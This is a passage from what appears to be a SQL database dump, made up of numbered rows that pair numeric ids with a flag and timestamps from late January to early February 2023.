17:05:05'),(68789,5253,1,'2023-01-28','2023-01-28 17:26:31'),(68790,470,1,'2023-01-28','2023-01-28 17:51:06'),(68791,1596,1,'2023-01-28','2023-01-28 17:57:20'),(68792,1614,1,'2023-01-28','2023-01-28 17:59:44'),(68793,470,1,'2023-01-28','2023-01-28 18:22:40'),(68794,2410,1,'2023-01-28','2023-01-28 18:40:09'),(68795,5256,1,'2023-01-28','2023-01-28 18:40:57'),(68796,4963,1,'2023-01-28','2023-01-28 19:38:10'),(68797,3307,1,'2023-01-28','2023-01-28 19:40:06'),(68798,5028,1,'2023-01-28','2023-01-28 19:53:16'),(68799,4542,1,'2023-01-28','2023-01-28 20:30:09'),(68800,3489,1,'2023-01-28','2023-01-28 21:08:32'),(68801,469,1,'2023-01-28','2023-01-28 21:29:56'),(68802,91,1,'2023-01-28','2023-01-28 21:42:42'),(68803,335,1,'2023-01-28','2023-01-28 23:28:38'),(68804,2410,1,'2023-01-28','2023-01-28 23:57:03'),(68805,335,1,'2023-01-29','2023-01-29 00:13:56'),(68806,4776,1,'2023-01-29','2023-01-29 02:30:33'),(68807,4524,1,'2023-01-29','2023-01-29 02:30:34'),(68808,4529,1,'2023-01-29','2023-01-29 02:30:35'),(68809,5268,1,'2023-01-29','2023-01-29 02:30:36'),(68810,3764,1,'2023-01-29','2023-01-29 02:30:38'),(68811,5268,1,'2023-01-29','2023-01-29 04:11:15'),(68812,3489,1,'2023-01-29','2023-01-29 04:22:15'),(68813,4657,1,'2023-01-29','2023-01-29 05:04:45'),(68814,4930,1,'2023-01-29','2023-01-29 06:56:21'),(68815,4642,1,'2023-01-29','2023-01-29 06:59:58'),(68816,4750,1,'2023-01-29','2023-01-29 08:26:32'),(68817,4747,1,'2023-01-29','2023-01-29 09:11:32'),(68818,5062,1,'2023-01-29','2023-01-29 09:29:49'),(68819,487,1,'2023-01-29','2023-01-29 09:31:03'),(68820,468,1,'2023-01-29','2023-01-29 09:33:16'),(68821,1870,1,'2023-01-29','2023-01-29 09:56:21'),(68822,2911,1,'2023-01-29','2023-01-29 10:05:04'),(68823,469,1,'2023-01-29','2023-01-29 11:00:20'),(68824,4457,1,'2023-01-29','2023-01-29 12:27:00'),(68825,3781,1,'2023-01-29','2023-01-29 15:06:59'),(68826,3781,1,'2023-01-29','2023-01-29 15:13:48'),(68827,1594,1,'2023-01-29','2023-01-29 15:35:04'),(68828,5268,1,'2023-01-29','2023-01-29 15:39:09'),(68829,3313,1,'2023-01-29','2023-01-29 16:10:40'),(68830,5163,1,'2023-01-29','2023-01-29 16:13:15'),(68831,1870,1,'2023-01-29','2023-01-29 16:15:20'),(68832,5163,1,'2023-01-29','2023-01-29 16:15:36'),(68833,4396,1,'2023-01-29','2023-01-29 17:46:17'),(68834,3004,1,'2023-01-29','2023-01-29 18:08:13'),(68835,1594,1,'2023-01-29','2023-01-29 19:59:08'),(68836,68,1,'2023-01-29','2023-01-29 20:08:00'),(68837,1774,1,'2023-01-29','2023-01-29 20:33:00'),(68838,1586,1,'2023-01-29','2023-01-29 20:36:08'),(68839,470,1,'2023-01-29','2023-01-29 21:23:38'),(68840,3738,1,'2023-01-29','2023-01-29 21:48:13'),(68841,2410,1,'2023-01-29','2023-01-29 23:04:54'),(68842,72,1,'2023-01-29','2023-01-29 23:05:42'),(68843,1724,1,'2023-01-29','2023-01-29 23:52:08'),(68844,3738,1,'2023-01-30','2023-01-30 00:33:37'),(68845,3030,1,'2023-01-30','2023-01-30 01:51:23'),(68846,1596,1,'2023-01-30','2023-01-30 04:46:19'),(68847,4753,1,'2023-01-30','2023-01-30 06:07:01'),(68848,3764,1,'2023-01-30','2023-01-30 06:33:34'),(68849,4412,1,'2023-01-30','2023-01-30 07:41:01'),(68850,1612,1,'2023-01-30','2023-01-30 07:53:55'),(68851,570,1,'2023-01-30','2023-01-30 08:25:27'),(68852,4776,1,'2023-01-30','2023-01-30 08:48:56'),(68853,4944,1,'2023-01-30','2023-01-30 09:00:46'),(68854,4944,1,'2023-01-30','2023-01-30 09:57:51'),(68855,5071,1,'2023-01-30','2023-01-30 10:06:28'),(68856,5071,1,'2023-01-30','2023-01-30 10:10:40'),(68857,4944,1,'2023-01-30','2023-01-30 10:42:46'),(68858,5256,1,'2023-01-30','2023-01-30 11:42:36'),(68859,5163,1,'2023-01-30','2023-01-30 12:09:53'),(68860,91,1,'2023-01-30','2023-01-30 12:11:23'),(68861,76,1,'2023-01-30','2023-01-30 12:12:13'),(68862,87,1,'2023-01-30','2023-01-30 12:13:27'),(68863,76,1,'2023-01-30','2023-01-30 12:14:02'),(68864,91,1,'2023-01-30','2023-01-30 12:14:04'),(68865,5163,1,'2023-01-30','2023-01-30 12:14:08'),(68866,4963,1,'2023-01-30','2023-01-30 12:36:14'),(68867,2904,1,'2023-01-30','2023-01-30 12:36:57'),(68868,2964,1,'2023-01-30','2023-01-30 12:40:53'),(68869,1588,1,'2023-01-30','2023-01-30 12:59:20'),(68870,3764,1,'2023-01-30','2023-01-30 13:16:45'),(68871,5268,1,'2023-01-30','2023-01-30 13:44:41'),(68872,4966,1,'2023-01-30','2023-01-30 14:23:45'),(68873,4301,1,'2023-01-30','2023-01-30 14:35:07'),(68874,5153,1,'2023-01-30','2023-01-30 14:37:09'),(68875,5153,1,'2023-01-30','2023-01-30 15:21:27'),(68876,4762,1,'2023-01-30','2023-01-30 15:48:20'),(68877,470,1,'2023-01-30','2023-01-30 15:52:19'),(68878,76,1,'2023-01-30','2023-01-30 15:52:32'),(68879,91,1,'2023-01-30','2023-01-30 15:52:46'),(68880,4457,1,'2023-01-30','2023-01-30 16:55:19'),(68881,4457,1,'2023-01-30','2023-01-30 16:56:44'),(68882,91,1,'2023-01-30','2023-01-30 16:57:23'),(68883,3109,1,'2023-01-30','2023-01-30 17:00:30'),(68884,91,1,'2023-01-30','2023-01-30 17:01:26'),(68885,5248,1,'2023-01-30','2023-01-30 17:03:58'),(68886,91,1,'2023-01-30','2023-01-30 17:06:53'),(68887,4457,1,'2023-01-30','2023-01-30 17:08:00'),(68888,1582,1,'2023-01-30','2023-01-30 17:20:55'),(68889,5062,1,'2023-01-30','2023-01-30 17:36:29'),(68890,4703,1,'2023-01-30','2023-01-30 18:04:54'),(68891,4457,1,'2023-01-30','2023-01-30 19:27:17'),(68892,5163,1,'2023-01-30','2023-01-30 19:29:15'),(68893,5101,1,'2023-01-30','2023-01-30 19:32:05'),(68894,5163,1,'2023-01-30','2023-01-30 19:33:19'),(68895,3764,1,'2023-01-30','2023-01-30 19:34:45'),(68896,4960,1,'2023-01-30','2023-01-30 20:04:45'),(68897,471,1,'2023-01-30','2023-01-30 20:06:39'),(68898,1592,1,'2023-01-30','2023-01-30 20:34:19'),(68899,2991,1,'2023-01-30','2023-01-30 21:36:04'),(68900,570,1,'2023-01-30','2023-01-30 22:06:32'),(68901,4750,1,'2023-01-30','2023-01-30 22:25:09'),(68902,1544,1,'2023-01-30','2023-01-30 23:50:21'),(68903,5071,1,'2023-01-31','2023-01-31 00:18:45'),(68904,5146,1,'2023-01-31','2023-01-31 00:25:47'),(68905,2165,1,'2023-01-31','2023-01-31 01:18:51'),(68906,1701,1,'2023-01-31','2023-01-31 01:24:43'),(68907,1770,1,'2023-01-31','2023-01-31 01:46:56'),(68908,1770,1,'2023-01-31','2023-01-31 01:48:40'),(68909,4412,1,'2023-01-31','2023-01-31 02:10:30'),(68910,1724,1,'2023-01-31','2023-01-31 02:16:01'),(68911,5062,1,'2023-01-31','2023-01-31 02:50:49'),(68912,1594,1,'2023-01-31','2023-01-31 02:51:18'),(68913,1711,1,'2023-01-31','2023-01-31 03:04:26'),(68914,2178,1,'2023-01-31','2023-01-31 03:09:55'),(68915,2159,1,'2023-01-31','2023-01-31 03:11:52'),(68916,4950,1,'2023-01-31','2023-01-31 03:21:26'),(68917,4238,1,'2023-01-31','2023-01-31 03:21:53'),(68918,1604,1,'2023-01-31','2023-01-31 03:36:39'),(68919,2297,1,'2023-01-31','2023-01-31 03:47:19'),(68920,4323,1,'2023-01-31','2023-01-31 04:06:28'),(68921,1720,1,'2023-01-31','2023-01-31 04:51:26'),(68922,487,1,'2023-01-31','2023-01-31 05:10:07'),(68923,4612,1,'2023-01-31','2023-01-31 05:10:11'),(68924,3005,1,'2023-01-31','2023-01-31 05:21:28'),(68925,3226,1,'2023-01-31','2023-01-31 07:10:30'),(68926,4963,1,'2023-01-31','2023-01-31 09:47:19'),(68927,5071,1,'2023-01-31','2023-01-31 10:17:34'),(68928,5071,1,'2023-01-31','2023-01-31 10:18:24'),(68929,3479,1,'2023-01-31','2023-01-31 11:49:25'),(68930,1598,1,'2023-01-31','2023-01-31 14:25:35'),(68931,4608,1,'2023-01-31','2023-01-31 14:29:39'),(68932,2751,1,'2023-01-31','2023-01-31 14:45:14'),(68933,2813,1,'2023-01-31','2023-01-31 14:53:33'),(68934,5268,1,'2023-01-31','2023-01-31 14:53:48'),(68935,2617,1,'2023-01-31','2023-01-31 14:55:03'),(68936,468,1,'2023-01-31','2023-01-31 15:08:58'),(68937,1612,1,'2023-01-31','2023-01-31 15:18:17'),(68938,5163,1,'2023-01-31','2023-01-31 15:40:48'),(68939,5163,1,'2023-01-31','2023-01-31 15:43:04'),(68940,2751,1,'2023-01-31','2023-01-31 16:08:28'),(68941,2775,1,'2023-01-31','2023-01-31 16:14:53'),(68942,1592,1,'2023-01-31','2023-01-31 16:23:38'),(68943,1600,1,'2023-01-31','2023-01-31 16:24:01'),(68944,1724,1,'2023-01-31','2023-01-31 16:26:12'),(68945,4963,1,'2023-01-31','2023-01-31 17:50:27'),(68946,2813,1,'2023-01-31','2023-01-31 17:53:33'),(68947,4960,1,'2023-01-31','2023-01-31 18:11:21'),(68948,68,1,'2023-01-31','2023-01-31 18:12:02'),(68949,4960,1,'2023-01-31','2023-01-31 18:12:35'),(68950,1602,1,'2023-01-31','2023-01-31 19:12:43'),(68951,1610,1,'2023-01-31','2023-01-31 19:32:20'),(68952,1610,1,'2023-01-31','2023-01-31 20:41:21'),(68953,3092,1,'2023-01-31','2023-01-31 21:18:50'),(68954,4391,1,'2023-01-31','2023-01-31 22:03:18'),(68955,3005,1,'2023-01-31','2023-01-31 22:49:54'),(68956,3313,1,'2023-01-31','2023-01-31 23:20:57'),(68957,80,1,'2023-01-31','2023-01-31 23:34:13'),(68958,3117,1,'2023-01-31','2023-01-31 23:52:09'),(68959,5140,1,'2023-02-01','2023-02-01 00:12:03'),(68960,2457,1,'2023-02-01','2023-02-01 00:21:46'),(68961,3313,1,'2023-02-01','2023-02-01 01:05:46'),(68962,1598,1,'2023-02-01','2023-02-01 01:22:07'),(68963,4457,1,'2023-02-01','2023-02-01 01:32:07'),(68964,4323,1,'2023-02-01','2023-02-01 02:02:46'),(68965,4420,1,'2023-02-01','2023-02-01 02:07:12'),(68966,87,1,'2023-02-01','2023-02-01 05:15:18'),(68967,2769,1,'2023-02-01','2023-02-01 06:08:21'),(68968,1722,1,'2023-02-01','2023-02-01 06:24:16'),(68969,1602,1,'2023-02-01','2023-02-01 06:41:26'),(68970,1588,1,'2023-02-01','2023-02-01 07:16:54'),(68971,2152,1,'2023-02-01','2023-02-01 07:32:49'),(68972,2769,1,'2023-02-01','2023-02-01 07:32:52'),(68973,1598,1,'2023-02-01','2023-02-01 08:07:07'),(68974,1604,1,'2023-02-01','2023-02-01 09:34:29'),(68975,2769,1,'2023-02-01','2023-02-01 09:39:22'),(68976,5271,1,'2023-02-01','2023-02-01 10:23:42'),(68977,5271,1,'2023-02-01','2023-02-01 10:24:50'),(68978,5271,1,'2023-02-01','2023-02-01 10:26:37'),(68979,1596,1,'2023-02-01','2023-02-01 10:36:32'),(68980,3079,1,'2023-02-01','2023-02-01 10:53:52'),(68981,4357,1,'2023-02-01','2023-02-01 11:07:50'),(68982,2411,1,'2023-02-01','2023-02-01 12:02:43'),(68983,1582,1,'2023-02-01','2023-02-01 12:09:22'),(68984,76,1,'2023-02-01','2023-02-01 12:10:01'),(68985,91,1,'2023-02-01','2023-02-01 12:10:25'),(68986,5259,1,'2023-02-01','2023-02-01 12:15:28'),(68987,3107,1,'2023-02-01','2023-02-01 12:35:38'),(68988,5001,1,'2023-02-01','2023-02-01 14:12:09'),(68989,5001,1,'2023-02-01','2023-02-01 14:12:41'),(68990,5001,1,'2023-02-01','2023-02-01 14:12:42'),(68991,84,1,'2023-02-01','2023-02-01 15:03:28'),(68992,1877,1,'2023-02-01','2023-02-01 15:03:38'),(68993,84,1,'2023-02-01','2023-02-01 15:03:44'),(68994,5001,1,'2023-02-01','2023-02-01 15:03:45'),(68995,4357,1,'2023-02-01','2023-02-01 15:05:33'),(68996,4457,1,'2023-02-01','2023-02-01 15:50:28'),(68997,4966,1,'2023-02-01','2023-02-01 15:57:16'),(68998,91,1,'2023-02-01','2023-02-01 16:00:15'),(68999,5062,1,'2023-02-01','2023-02-01 16:14:06'),(69000,4966,1,'2023-02-01','2023-02-01 18:00:38'),(69001,3691,1,'2023-02-01','2023-02-01 18:29:54'),(69002,4960,1,'2023-02-01','2023-02-01 19:07:33'),(69003,4911,1,'2023-02-01','2023-02-01 19:15:45'),(69004,4703,1,'2023-02-01','2023-02-01 19:53:04'),(69005,4768,1,'2023-02-01','2023-02-01 20:08:02'),(69006,3307,1,'2023-02-01','2023-02-01 20:22:57'),(69007,4911,1,'2023-02-01','2023-02-01 21:15:04'),(69008,1728,1,'2023-02-01','2023-02-01 21:17:24'),(69009,3124,1,'2023-02-01','2023-02-01 21:19:07'),(69010,2971,1,'2023-02-01','2023-02-01 21:49:06'),(69011,3092,1,'2023-02-01','2023-02-01 21:53:23'),(69012,4391,1,'2023-02-01','2023-02-01 22:06:19'),(69013,4911,1,'2023-02-01','2023-02-01 23:14:34'),(69014,4396,1,'2023-02-01','2023-02-01 23:47:35'),(69015,4416,1,'2023-02-02','2023-02-02 01:58:00'),(69016,4960,1,'2023-02-02','2023-02-02 02:02:15'),(69017,4520,1,'2023-02-02','2023-02-02 02:48:30'),(69018,3004,1,'2023-02-02','2023-02-02 03:15:37'),(69019,3240,1,'2023-02-02','2023-02-02 03:28:00'),(69020,5271,1,'2023-02-02','2023-02-02 03:31:54'),(69021,5271,1,'2023-02-02','2023-02-02 03:31:54'),(69022,1608,1,'2023-02-02','2023-02-02 04:56:15'),(69023,4709,1,'2023-02-02','2023-02-02 05:40:16'),(69024,3006,1,'2023-02-02','2023-02-02 06:23:18'),(69025,4428,1,'2023-02-02','2023-02-02 06:24:28'),(69026,3265,1,'2023-02-02','2023-02-02 07:17:44'),(69027,80,1,'2023-02-02','2023-02-02 07:52:52'),(69028,4457,1,'2023-02-02','2023-02-02 07:56:09'),(69029,4348,1,'2023-02-02','2023-02-02 07:58:49'),(69030,2419,1,'2023-02-02','2023-02-02 08:42:00'),(69031,3045,1,'2023-02-02','2023-02-02 08:42:11'),(69032,1751,1,'2023-02-02','2023-02-02 09:02:47'),(69033,5137,1,'2023-02-02','2023-02-02 09:17:05'),(69034,488,1,'2023-02-02','2023-02-02 09:52:12'),(69035,5062,1,'2023-02-02','2023-02-02 09:52:50'),(69036,3764,1,'2023-02-02','2023-02-02 10:00:06'),(69037,1770,1,'2023-02-02','2023-02-02 10:22:55'),(69038,4960,1,'2023-02-02','2023-02-02 10:34:57'),(69039,3307,1,'2023-02-02','2023-02-02 10:43:55'),(69040,1718,1,'2023-02-02','2023-02-02 12:45:27'),(69041,5037,1,'2023-02-02','2023-02-02 13:08:43'),(69042,110,1,'2023-02-02','2023-02-02 13:13:29'),(69043,4738,1,'2023-02-02','2023-02-02 13:18:09'),(69044,4424,1,'2023-02-02','2023-02-02 13:40:40'),(69045,3226,1,'2023-02-02','2023-02-02 13:55:43'),(69046,3124,1,'2023-02-02','2023-02-02 14:06:12'),(69047,4654,1,'2023-02-02','2023-02-02 14:12:14'),(69048,4911,1,'2023-02-02','2023-02-02 14:22:27'),(69049,1600,1,'2023-02-02','2023-02-02 14:32:11'),(69050,4960,1,'2023-02-02','2023-02-02 14:41:33'),(69051,1602,1,'2023-02-02','2023-02-02 14:48:29'),(69052,2297,1,'2023-02-02','2023-02-02 14:56:14'),(69053,4448,1,'2023-02-02','2023-02-02 15:04:15'),(69054,3226,1,'2023-02-02','2023-02-02 15:04:43'),(69055,3731,1,'2023-02-02','2023-02-02 15:29:28'),(69056,3307,1,'2023-02-02','2023-02-02 15:33:42'),(69057,4412,1,'2023-02-02','2023-02-02 16:45:32'),(69058,4341,1,'2023-02-02','2023-02-02 17:13:43'),(69059,1770,1,'2023-02-02','2023-02-02 17:42:01'),(69060,1718,1,'2023-02-02','2023-02-02 18:22:38'),(69061,1614,1,'2023-02-02','2023-02-02 19:11:46'),(69062,4694,1,'2023-02-02','2023-02-02 19:12:30'),(69063,4524,1,'2023-02-02','2023-02-02 19:56:37'),(69064,1610,1,'2023-02-02','2023-02-02 21:13:57'),(69065,4363,1,'2023-02-02','2023-02-02 21:20:22'),(69066,1602,1,'2023-02-02','2023-02-02 22:15:00'),(69067,4363,1,'2023-02-02','2023-02-02 22:30:03'),(69068,1544,1,'2023-02-03','2023-02-03 00:03:59'),(69069,87,1,'2023-02-03','2023-02-03 00:41:07'),(69070,3023,1,'2023-02-03','2023-02-03 01:46:31'),(69071,467,1,'2023-02-03','2023-02-03 02:01:17'),(69072,3245,1,'2023-02-03','2023-02-03 02:53:35'),(69073,1614,1,'2023-02-03','2023-02-03 03:04:50'),(69074,3273,1,'2023-02-03','2023-02-03 03:54:11'),(69075,3479,1,'2023-02-03','2023-02-03 04:57:24'),(69076,3691,1,'2023-02-03','2023-02-03 05:00:14'),(69077,5268,1,'2023-02-03','2023-02-03 06:57:55'),(69078,3090,1,'2023-02-03','2023-02-03 07:36:24'),(69079,476,1,'2023-02-03','2023-02-03 08:27:14'),(69080,3245,1,'2023-02-03','2023-02-03 09:12:06'),(69081,91,1,'2023-02-03','2023-02-03 09:48:50'),(69082,4883,1,'2023-02-03','2023-02-03 09:50:08'),(69083,4870,1,'2023-02-03','2023-02-03 09:53:37'),(69084,4238,1,'2023-02-03','2023-02-03 09:58:09'),(69085,4966,1,'2023-02-03','2023-02-03 10:35:24'),(69086,4238,1,'2023-02-03','2023-02-03 10:40:03'),(69087,1602,1,'2023-02-03','2023-02-03 11:19:32'),(69088,4457,1,'2023-02-03','2023-02-03 11:37:45'),(69089,1586,1,'2023-02-03','2023-02-03 11:58:18'),(69090,4966,1,'2023-02-03','2023-02-03 12:40:49'),(69091,1612,1,'2023-02-03','2023-02-03 12:44:54'),(69092,4966,1,'2023-02-03','2023-02-03 12:55:57'),(69093,1612,1,'2023-02-03','2023-02-03 12:59:39'),(69094,3691,1,'2023-02-03','2023-02-03 13:04:00'),(69095,1600,1,'2023-02-03','2023-02-03 13:56:02'),(69096,1544,1,'2023-02-03','2023-02-03 14:00:50'),(69097,4966,1,'2023-02-03','2023-02-03 14:21:25'),(69098,5062,1,'2023-02-03','2023-02-03 14:35:28'),(69099,4756,1,'2023-02-03','2023-02-03 14:39:28'),(69100,1586,1,'2023-02-03','2023-02-03 15:04:01'),(69101,5020,1,'2023-02-03','2023-02-03 15:08:41'),(69102,1780,1,'2023-02-03','2023-02-03 15:14:41'),(69103,4744,1,'2023-02-03','2023-02-03 15:20:16'),(69104,5067,1,'2023-02-03','2023-02-03 15:26:09'),(69105,4911,1,'2023-02-03','2023-02-03 15:31:13'),(69106,478,1,'2023-02-03','2023-02-03 15:38:53'),(69107,4762,1,'2023-02-03','2023-02-03 15:52:43'),(69108,1766,1,'2023-02-03','2023-02-03 16:34:32'),(69109,4771,1,'2023-02-03','2023-02-03 16:50:59'),(69110,4759,1,'2023-02-03','2023-02-03 16:51:18'),(69111,89,1,'2023-02-03','2023-02-03 17:09:54'),(69112,4756,1,'2023-02-03','2023-02-03 17:12:35'),(69113,4457,1,'2023-02-03','2023-02-03 17:17:02'),(69114,4457,1,'2023-02-03','2023-02-03 17:20:22'),(69115,1594,1,'2023-02-03','2023-02-03 17:54:13'),(69116,3721,1,'2023-02-03','2023-02-03 17:56:13'),(69117,4911,1,'2023-02-03','2023-02-03 18:01:48'),(69118,1745,1,'2023-02-03','2023-02-03 18:21:14'),(69119,4960,1,'2023-02-03','2023-02-03 18:38:06'),(69120,80,1,'2023-02-03','2023-02-03 18:38:19'),(69121,2419,1,'2023-02-03','2023-02-03 18:38:59'),(69122,4960,1,'2023-02-03','2023-02-03 18:39:52'),(69123,4960,1,'2023-02-03','2023-02-03 18:40:00'),(69124,4960,1,'2023-02-03','2023-02-03 18:58:25'),(69125,4348,1,'2023-02-03','2023-02-03 22:02:14'),(69126,4944,1,'2023-02-03','2023-02-03 22:50:35'),(69127,4944,1,'2023-02-03','2023-02-03 22:50:38'),(69128,2658,1,'2023-02-03','2023-02-03 23:33:24'),(69129,1608,1,'2023-02-04','2023-02-04 00:09:17'),(69130,1602,1,'2023-02-04','2023-02-04 00:09:39'),(69131,80,1,'2023-02-04','2023-02-04 00:09:49'),(69132,4348,1,'2023-02-04','2023-02-04 00:10:28'),(69133,1602,1,'2023-02-04','2023-02-04 00:15:13'),(69134,1602,1,'2023-02-04','2023-02-04 00:16:06'),(69135,1608,1,'2023-02-04','2023-02-04 00:16:17'),(69136,2154,1,'2023-02-04','2023-02-04 00:47:37'),(69137,1596,1,'2023-02-04','2023-02-04 01:13:45'),(69138,76,1,'2023-02-04','2023-02-04 01:19:27'),(69139,1582,1,'2023-02-04','2023-02-04 02:18:29'),(69140,108,1,'2023-02-04','2023-02-04 03:00:20'),(69141,1594,1,'2023-02-04','2023-02-04 03:23:03'),(69142,5042,1,'2023-02-04','2023-02-04 03:43:17'),(69143,3066,1,'2023-02-04','2023-02-04 03:53:13'),(69144,1594,1,'2023-02-04','2023-02-04 04:08:17'),(69145,3109,1,'2023-02-04','2023-02-04 04:26:53'),(69146,91,1,'2023-02-04','2023-02-04 05:06:58'),(69147,2154,1,'2023-02-04','2023-02-04 05:28:50'),(69148,2769,1,'2023-02-04','2023-02-04 07:39:47'),(69149,4404,1,'2023-02-04','2023-02-04 08:11:41'),(69150,72,1,'2023-02-04','2023-02-04 08:16:20'),(69151,1594,1,'2023-02-04','2023-02-04 09:31:49'),(69152,89,1,'2023-02-04','2023-02-04 11:07:50'),(69153,4911,1,'2023-02-04','2023-02-04 13:12:56'),(69154,4911,1,'2023-02-04','2023-02-04 13:53:43'),(69155,4911,1,'2023-02-04','2023-02-04 13:57:37'),(69156,3781,1,'2023-02-04','2023-02-04 14:22:06'),(69157,1766,1,'2023-02-04','2023-02-04 14:22:53'),(69158,3004,1,'2023-02-04','2023-02-04 14:44:04'),(69159,4436,1,'2023-02-04','2023-02-04 15:00:07'),(69160,5128,1,'2023-02-04','2023-02-04 15:09:43'),(69161,1606,1,'2023-02-04','2023-02-04 15:29:49'),(69162,2148,1,'2023-02-04','2023-02-04 16:10:40'),(69163,4238,1,'2023-02-04','2023-02-04 16:51:29'),(69164,3721,1,'2023-02-04','2023-02-04 17:07:31'),(69165,4457,1,'2023-02-04','2023-02-04 17:09:05'),(69166,2148,1,'2023-02-04','2023-02-04 18:29:25'),(69167,1602,1,'2023-02-04','2023-02-04 18:53:18'),(69168,1602,1,'2023-02-04','2023-02-04 19:56:52'),(69169,4960,1,'2023-02-04','2023-02-04 19:59:31'),(69170,1582,1,'2023-02-04','2023-02-04 20:53:14'),(69171,1610,1,'2023-02-04','2023-02-04 20:55:35'),(69172,80,1,'2023-02-04','2023-02-04 22:10:17'),(69173,4771,1,'2023-02-04','2023-02-04 22:27:59'),(69174,3498,1,'2023-02-04','2023-02-04 22:44:31'),(69175,1596,1,'2023-02-04','2023-02-04 23:02:31'),(69176,3698,1,'2023-02-04','2023-02-04 23:03:23'),(69177,4582,1,'2023-02-04','2023-02-04 23:34:53'),(69178,4765,1,'2023-02-04','2023-02-04 23:42:03'),(69179,3498,1,'2023-02-05','2023-02-05 00:49:58'),(69180,1608,1,'2023-02-05','2023-02-05 01:46:55'),(69181,3027,1,'2023-02-05','2023-02-05 02:35:04'),(69182,1586,1,'2023-02-05','2023-02-05 03:20:44'),(69183,5256,1,'2023-02-05','2023-02-05 03:22:14'),(69184,5256,1,'2023-02-05','2023-02-05 03:23:52'),(69185,5256,1,'2023-02-05','2023-02-05 03:24:27'),(69186,2457,1,'2023-02-05','2023-02-05 03:42:12'),(69187,1586,1,'2023-02-05','2023-02-05 04:21:01'),(69188,5050,1,'2023-02-05','2023-02-05 05:15:25'),(69189,5062,1,'2023-02-05','2023-02-05 05:30:26'),(69190,5042,1,'2023-02-05','2023-02-05 06:22:24'),(69191,4765,1,'2023-02-05','2023-02-05 07:02:59'),(69192,3771,1,'2023-02-05','2023-02-05 08:33:56'),(69193,5046,1,'2023-02-05','2023-02-05 09:10:33'),(69194,1602,1,'2023-02-05','2023-02-05 09:24:17'),(69195,1596,1,'2023-02-05','2023-02-05 10:24:36'),(69196,1606,1,'2023-02-05','2023-02-05 10:29:00'),(69197,1602,1,'2023-02-05','2023-02-05 11:06:46'),(69198,2395,1,'2023-02-05','2023-02-05 11:39:31'),(69199,3109,1,'2023-02-05','2023-02-05 11:44:43'),(69200,3102,1,'2023-02-05','2023-02-05 13:22:38'),(69201,4776,1,'2023-02-05','2023-02-05 14:05:45'),(69202,1544,1,'2023-02-05','2023-02-05 14:14:17'),(69203,87,1,'2023-02-05','2023-02-05 14:25:46'),(69204,4966,1,'2023-02-05','2023-02-05 14:30:22'),(69205,3764,1,'2023-02-05','2023-02-05 14:30:42'),(69206,3764,1,'2023-02-05','2023-02-05 14:30:53'),(69207,4412,1,'2023-02-05','2023-02-05 14:35:40'),(69208,1606,1,'2023-02-05','2023-02-05 14:47:26'),(69209,3083,1,'2023-02-05','2023-02-05 15:04:47'),(69210,3083,1,'2023-02-05','2023-02-05 15:30:46'),(69211,3079,1,'2023-02-05','2023-02-05 15:50:46'),(69212,84,1,'2023-02-05','2023-02-05 15:51:10'),(69213,3764,1,'2023-02-05','2023-02-05 16:02:58'),(69214,473,1,'2023-02-05','2023-02-05 16:08:41'),(69215,473,1,'2023-02-05','2023-02-05 16:09:29'),(69216,473,1,'2023-02-05','2023-02-05 16:09:59'),(69217,4802,1,'2023-02-05','2023-02-05 18:09:47'),(69218,76,1,'2023-02-05','2023-02-05 18:38:54'),(69219,5122,1,'2023-02-05','2023-02-05 19:25:42'),(69220,4966,1,'2023-02-05','2023-02-05 19:41:24'),(69221,4996,1,'2023-02-05','2023-02-05 19:43:33'),(69222,4744,1,'2023-02-05','2023-02-05 19:50:01'),(69223,4582,1,'2023-02-05','2023-02-05 19:50:28'),(69224,1588,1,'2023-02-05','2023-02-05 20:14:04'),(69225,3251,1,'2023-02-05','2023-02-05 20:22:33'),(69226,4938,1,'2023-02-05','2023-02-05 20:58:56'),(69227,1586,1,'2023-02-05','2023-02-05 21:09:58'),(69228,1778,1,'2023-02-05','2023-02-05 21:23:57'),(69229,1588,1,'2023-02-05','2023-02-05 21:26:54'),(69230,4963,1,'2023-02-05','2023-02-05 21:59:53'),(69231,4457,1,'2023-02-05','2023-02-05 22:10:28'),(69232,5271,1,'2023-02-05','2023-02-05 22:18:25'),(69233,5271,1,'2023-02-06','2023-02-06 00:23:27'),(69234,2395,1,'2023-02-06','2023-02-06 00:40:13'),(69235,3735,1,'2023-02-06','2023-02-06 02:18:48'),(69236,1608,1,'2023-02-06','2023-02-06 02:57:04'),(69237,4608,1,'2023-02-06','2023-02-06 03:40:43'),(69238,1594,1,'2023-02-06','2023-02-06 03:48:42'),(69239,2775,1,'2023-02-06','2023-02-06 04:18:40'),(69240,1600,1,'2023-02-06','2023-02-06 04:41:50'),(69241,5020,1,'2023-02-06','2023-02-06 05:11:27'),(69242,2309,1,'2023-02-06','2023-02-06 05:18:45'),(69243,1594,1,'2023-02-06','2023-02-06 05:49:25'),(69244,4412,1,'2023-02-06','2023-02-06 06:31:18'),(69245,5028,1,'2023-02-06','2023-02-06 06:51:53'),(69246,4950,1,'2023-02-06','2023-02-06 07:45:57'),(69247,4404,1,'2023-02-06','2023-02-06 08:19:21'),(69248,2148,1,'2023-02-06','2023-02-06 08:42:26'),(69249,4301,1,'2023-02-06','2023-02-06 09:33:51'),(69250,3038,1,'2023-02-06','2023-02-06 09:37:28'),(69251,1590,1,'2023-02-06','2023-02-06 09:48:18'),(69252,2159,1,'2023-02-06','2023-02-06 09:49:46'),(69253,2609,1,'2023-02-06','2023-02-06 10:15:58'),(69254,68,1,'2023-02-06','2023-02-06 10:55:16'),(69255,91,1,'2023-02-06','2023-02-06 10:58:10'),(69256,91,1,'2023-02-06','2023-02-06 10:59:12'),(69257,68,1,'2023-02-06','2023-02-06 10:59:16'),(69258,68,1,'2023-02-06','2023-02-06 11:05:39'),(69259,5080,1,'2023-02-06','2023-02-06 11:45:59'),(69260,1602,1,'2023-02-06','2023-02-06 12:25:36'),(69261,5163,1,'2023-02-06','2023-02-06 12:57:54'),(69262,1602,1,'2023-02-06','2023-02-06 13:08:37'),(69263,80,1,'2023-02-06','2023-02-06 13:09:38'),(69264,1594,1,'2023-02-06','2023-02-06 13:58:43'),(69265,4960,1,'2023-02-06','2023-02-06 14:07:07'),(69266,470,1,'2023-02-06','2023-02-06 15:08:49'),(69267,1596,1,'2023-02-06','2023-02-06 15:12:46'),(69268,84,1,'2023-02-06','2023-02-06 15:22:44'),(69269,5163,1,'2023-02-06','2023-02-06 15:27:51'),(69270,5163,1,'2023-02-06','2023-02-06 16:04:44'),(69271,4862,1,'2023-02-06','2023-02-06 16:19:57'),(69272,108,1,'2023-02-06','2023-02-06 16:20:15'),(69273,84,1,'2023-02-06','2023-02-06 16:42:43'),(69274,89,1,'2023-02-06','2023-02-06 